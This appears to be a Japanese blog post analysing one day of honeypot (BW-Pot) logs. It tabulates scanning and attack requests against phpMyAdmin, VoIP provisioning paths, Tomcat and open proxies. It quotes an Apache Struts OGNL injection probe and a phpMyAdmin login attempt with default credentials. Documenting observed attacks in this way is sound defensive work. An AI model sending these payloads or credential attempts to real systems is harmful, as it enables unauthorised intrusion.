1 phpMyAdminに関する攻撃 GET /pmamy2/index.php?pma_username=root&pma_password=websoft9&server=1
1 phpMyAdminに関する調査 GET /pmamy2/index.php
1 phpMyAdminに関する調査 GET /MyAdmin/scripts/setup.php
1 phpMyAdminに関する調査 GET /myadmin/scripts/setup.php
1 phpMyAdminに関する調査 GET /phpmy/scripts/setup.php
1 アクセス HEAD /
1 VOIPに関する調査 GET /aastra/
1 VOIPに関する調査 GET /configs/
1 VOIPに関する調査 GET /gs/
1 VOIPに関する調査 GET /lib/
1 VOIPに関する調査 GET /polycom/
1 VOIPに関する調査 GET /provision/
1 VOIPに関する調査 GET /provisioning/
1 VOIPに関する調査 GET /spa/
1 VOIPに関する調査 GET /spa2102/
1 VOIPに関する調査 GET /tftp/
1 VOIPに関する調査 GET /voip_provisioning/
1 VOIPに関する調査 GET /xmlservices/
1 WebDAVに関する調査 GET /webdav/
1 不明 PROPFIND /

BW-Potのログ分析 (2019/04/16)

本日の総アクセス件数は149件です。送信元IP数は69IPです。

Apache Struts脆弱性調査と思われる通信を観測 
 どうやら以下の三つの脆弱性に関する調査のようです
 ・CVE-2013-2251
 ・CVE-2017-5638
 ・CVE-2018-11776
  
リクエス

Post / redirect:${#zzz=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#zzz.getWriter().print("xxxfind"),#zzz.getWriter().print("xxx"),#zzz.getWriter().flush(),#zzz.getWriter().close()}
件数 種別 リクエス
62 アクセス GET /
72 phpMyAdminに関する攻撃 POST /phpmyadmin/
62 アクセス GET /
3 不正中継の調査 GET www.baidu[.]com/
1 不正中継の調査 GET api.huobi[.]pro/market/detail?symbol=ethusdt
1 不正中継の調査 POST 159.89.182[.]124/tmUnblock.cgi
1 Apache Strutsに関する調査 POST /
1 DFindによるスキャン GET /w00tw00t.at.ISC.SANS.DFind:)
1 Tomcat管理ページへのブルートフォース攻撃 GET /manager/html
1 phpMyAdminに関する調査 GET /MyAdmin/scripts/setup.php
1 phpMyAdminに関する調査 GET /myadmin/scripts/setup.php
1 phpMyAdminに関する調査 GET /phpMyAdmin/scripts/setup.php
1 phpMyAdminに関する調査 GET /phpmyadmin/scripts/setup.php
1 phpMyAdminに関する調査 GET /pma/scripts/setup.php
1 phpMyAdminに関する調査 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 不明 GET /admin/connection/

参考リンク